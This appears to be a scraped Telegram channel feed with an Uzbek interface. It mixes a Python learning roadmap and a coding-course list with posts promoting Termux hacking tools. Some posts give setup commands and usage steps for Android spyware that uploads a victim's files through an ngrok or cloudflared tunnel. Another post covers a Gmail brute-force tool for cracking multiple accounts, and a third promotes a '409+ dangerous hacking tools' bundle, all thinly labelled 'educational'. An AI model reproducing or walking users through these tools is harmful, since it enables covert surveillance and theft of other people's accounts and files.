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Efiopiya, Inglizcha
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Simple Android spyware that uploads all files from user selected paths.

pkg update && pkg upgrade -y
pkg install git pv unzip -y
git clone
cd Spim3/

Example usage:

- open new session
cd Files/
php -S > /dev/null 2>&1 &

- Tunnel using cloudflared
cloudflared tunnel --url

- Tunnel using ngrok
ngrok http 8080

- on main session:


- Enter the url from ngrok/cloudflare.
- Enter paths, if done then Enter done.
- Compile /sdcard/Spim3/decompiled Using apktool_M
⚠️Termux tools are for educational use only.

💰Play FOXCOIN and earn cash for free! 🤑

🎁I’ve already withdrawn—don’t miss out! 💵

Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish

Learn New Skills FREE:

1. HTML ➝

2. CSS ➝

3. JavaScript ➝

4. React ➝

5. Tailwind CSS ➝

6. Vue  ➝

7. Python ➝

8. SQL ➝

9. Git and GitHub ➝

10. Blockchain ➝

11. Mongo DB ➝

12. Node JS ➝

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Python Learning Plan in 2024

|-- Week 1: Introduction to Python
|   |-- Python Basics
|   |   |-- What is Python?
|   |   |-- Installing Python
|   |   |-- Introduction to IDEs (Jupyter, VS Code)
|   |-- Setting up Python Environment
|   |   |-- Anaconda Setup
|   |   |-- Virtual Environments
|   |   |-- Basic Syntax and Data Types
|   |-- First Python Program
|   |   |-- Writing and Running Python Scripts
|   |   |-- Basic Input/Output
|   |   |-- Simple Calculations
|-- Week 2: Core Python Concepts
|   |-- Control Structures
|   |   |-- Conditional Statements (if, elif, else)
|   |   |-- Loops (for, while)
|   |   |-- Comprehensions
|   |-- Functions
|   |   |-- Defining Functions
|   |   |-- Function Arguments and Return Values
|   |   |-- Lambda Functions
|   |-- Modules and Packages
|   |   |-- Importing Modules
|   |   |-- Standard Library Overview
|   |   |-- Creating and Using Packages
|-- Week 3: Advanced Python Concepts
|   |-- Data Structures
|   |   |-- Lists, Tuples, and Sets
|   |   |-- Dictionaries
|   |   |-- Collections Module
|   |-- File Handling
|   |   |-- Reading and Writing Files
|   |   |-- Working with CSV and JSON
|   |   |-- Context Managers
|   |-- Error Handling
|   |   |-- Exceptions
|   |   |-- Try, Except, Finally
|   |   |-- Custom Exceptions
|-- Week 4: Object-Oriented Programming
|   |-- OOP Basics
|   |   |-- Classes and Objects
|   |   |-- Attributes and Methods
|   |   |-- Inheritance
|   |-- Advanced OOP
|   |   |-- Polymorphism
|   |   |-- Encapsulation
|   |   |-- Magic Methods and Operator Overloading
|   |-- Design Patterns
|   |   |-- Singleton
|   |   |-- Factory
|   |   |-- Observer
|-- Week 5: Python for Data Analysis
|   |-- NumPy
|   |   |-- Arrays and Vectorization
|   |   |-- Indexing and Slicing
|   |   |-- Mathematical Operations
|   |-- Pandas
|   |   |-- DataFrames and Series
|   |   |-- Data Cleaning and Manipulation
|   |   |-- Merging and Joining Data
|   |-- Matplotlib and Seaborn
|   |   |-- Basic Plotting
|   |   |-- Advanced Visualizations
|   |   |-- Customizing Plots
|-- Week 6-8: Specialized Python Libraries
|   |-- Web Development
|   |   |-- Flask Basics
|   |   |-- Django Basics
|   |-- Data Science and Machine Learning
|   |   |-- Scikit-Learn
|   |   |-- TensorFlow and Keras
|   |-- Automation and Scripting
|   |   |-- Automating Tasks with Python
|   |   |-- Web Scraping with BeautifulSoup and Scrapy
|   |-- APIs and RESTful Services
|   |   |-- Working with REST APIs
|   |   |-- Building APIs with Flask/Django
|-- Week 9-11: Real-world Applications and Projects
|   |-- Capstone Project
|   |   |-- Project Planning
|   |   |-- Data Collection and Preparation
|   |   |-- Building and Optimizing Models
|   |   |-- Creating and Publishing Reports
|   |-- Case Studies
|   |   |-- Business Use Cases
|   |   |-- Industry-specific Solutions
|   |-- Integration with Other Tools
|   |   |-- Python and SQL
|   |   |-- Python and Excel
|   |   |-- Python and Power BI
|-- Week 12: Post-Project Learning
|   |-- Python for Automation
|   |   |-- Automating Daily Tasks
|   |   |-- Scripting with Python
|   |-- Advanced Python Topics
|   |   |-- Asyncio and Concurrency
|   |   |-- Advanced Data Structures
|   |-- Continuing Education
|   |   |-- Advanced Python Techniques
|   |   |-- Community and Forums
|   |   |-- Keeping Up with Updates
|-- Resources community
|   |-- Online Courses (Coursera, edX, Udemy)
|   |-- Books (Automate the Boring Stuff, Python Crash Course)
|   |-- Python Blogs and Podcasts
|   |-- GitHub Repositories
|   |-- Python community (Reddit, Stack Overflow)

Here you can find essential Python Interview Resources👇

Like this post for more resources like this 👍♥️

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Hope it helps :)

A tool to brute force a gmail account. Use this tool to crack multiple accounts.

apt install python3
git clone
cd Gmail-Brute
chmod +x *
Enter path of mail list
You can use defaul wordlist (passwords)
Use of defaul proxy is not recommended
First of all create a new file email.txt and add your emails for cracking inside Gmail-Brute folder

Now start the tool from above usage commands

Put email file for 1st option, next it is asking for wordlist. Due to large file size, developer removed default wordlist so we will have to add our own.

These are not default proxies that i'm using, i have edited all the default proxies that's why i presses 'n' for proxy option, otherwise add path if you press 'y'
If you have entered everything perfectly, you'll see the cracking

⚠️Termux tools are for educational use only. For more information about this tool, visit the GitHub link

Termux Tools | 409+ Dangerous hacking Tool in 1 Termux Tool

pkg update && pkg upgrade

pkg install git -y

git clone

cd wiki-termux

chmod +x *


⚠️Termux tools are for educational use only. For more information about this tool, visit the GitHub link.


20 ta oxirgi post ko‘rsatilgan.